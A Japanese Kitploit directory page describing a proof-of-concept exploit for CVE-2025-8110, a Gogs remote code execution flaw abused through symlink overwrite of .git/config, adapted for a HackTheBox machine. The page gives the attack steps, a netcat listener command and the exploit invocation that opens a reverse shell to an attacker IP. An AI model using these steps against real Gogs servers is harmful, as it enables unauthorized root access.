Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8110 — Gogs サービスをエクスプロイトし、ルートユーザーを取得する | Kitploit
ツール/GitHubGitHub/ixzodiak/cve-2025-8110
エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育レッドチーミングリモートアクセスツール
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Gogs サービスをエクスプロイトし、ルートユーザーを取得する

リポジトリを見る
491ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8110 — Gogs RCE PoC(Silentium / HackTheBox)

免責事項: このツールは、教育目的および許可を得たペネトレーションテスト専用に意図されています。明示的なテスト許可を得たシステムに対してのみ使用してください。


これは zAbuQasem/gogs-CVE-2025-8110 の修正版であり、HackTheBox の Silentium マシンに対して動作するように適合させたものです。元の PoC は、Silentium 固有の Gogs 設定と認証フローに対応するための調整が必要でした。


脆弱性

CVE-2025-8110 は、セルフホスト型 Git サービスである Gogs におけるリモートコード実行(RCE)脆弱性です。

Gogs のファイル更新 API エンドポイント(PUT /api/v1/repos/.../contents/<file>)は、対象ファイルがシンボリックリンクであるかどうかを検証しません。認証済みの攻撃者は、.git/config を指すシンボリックリンクをリポジトリにプッシュし、その API を使って悪意のあるペイロードで上書きすることができます。このペイロードは git config にカスタムの sshCommand を注入し、Gogs は次にそのリポジトリに対して SSH 操作を実行する際にサーバー側でそれを実行するため、リモートコード実行につながります。


PoC の動作

  1. Gogs に認証し、ログインページから CSRF トークンを取得します。
  2. ユーザー設定ページから Gogs API トークンを生成します。
  3. API 経由で SSH を有効にした新しいリポジトリを作成します。
  4. リポジトリをローカルにクローンし、シンボリックリンク(malicious_link -> .git/config)を仕込んでプッシュします。
  5. シンボリックリンクに対してファイル更新 API を呼び出し、sshCommand = <reverse shell> を含む悪意のある .git/config を書き込みます。
  6. Gogs はシンボリックリンクをたどって自身の .git/config を上書きし、次の SSH 操作でシェルを起動させます。

使用方法

依存関係のインストール:

root@kitploit:~
pip install -r requirements.txt

リスナーの起動:

root@kitploit:~
nc -lvnp <PORT>

エクスプロイトの実行:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

オプション — Burp Suite 経由でルーティングする場合:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
ツールをダウンロード
フラグ説明
-uGogs のベース URL
-lh攻撃者の IP アドレス(リバースシェルのホスト)
-lpリスナーのポート
-un登録済みの Gogs ユーザー名
-pwGogs のパスワード
-x(任意)localhost:8080 の Burp 経由でトラフィックをルーティングする